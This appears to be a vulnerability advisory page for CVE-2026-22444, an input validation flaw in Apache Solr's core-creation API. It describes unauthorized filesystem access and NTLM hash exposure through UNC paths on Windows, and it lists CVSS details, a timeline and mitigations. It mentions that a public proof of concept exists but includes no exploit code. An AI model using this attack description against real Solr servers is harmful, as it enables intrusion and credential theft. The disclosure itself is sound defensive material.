Input Validation Flaw in Apache Solr Affects Core Creation Process
CVE-2026-22444

7.1HIGH

Key Information:

Vendor: Apache
Status: Apache Solr
Vendor: CVE Published:; 21 January 2026

Badges

👾 Exploit Exists🟡 Public PoC

What is CVE-2026-22444?

The 'create core' API in Apache Solr, from versions 8.6 to 9.10.0, is affected by insufficient input validation on certain API parameters. This flaw permits unauthorized filesystem access, potentially allowing users to create cores using unexpected configuration sets if accessible. Particularly on Windows systems with UNC path support, this could also expose sensitive NTLM 'user' hashes. To secure installations, it is essential to ensure that Solr operates in standalone mode with proper restrictions, leveraging the 'allowPaths' setting and enabling the RuleBasedAuthorizationPlugin to manage permissions effectively. Users are advised to upgrade to Apache Solr version 9.10.1 or later to mitigate these risks.

Affected Version(s)

Apache Solr 8.6 <= 9.10.0

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

CVE-2026-22444
Created by dptsec

References

https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkt...

vendor-advisory

CVSS V3.1

Score:

7.1

Severity:

HIGH

Confidentiality:

High

Integrity:

Low

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Unchanged

Timeline

🟡
Public PoC available
Jan 23, 2026
👾
Exploit known to exist
Jan 23, 2026
Vulnerability published
Jan 21, 2026
Vulnerability Reserved
Jan 7, 2026

Credit

Damon Toey

JSON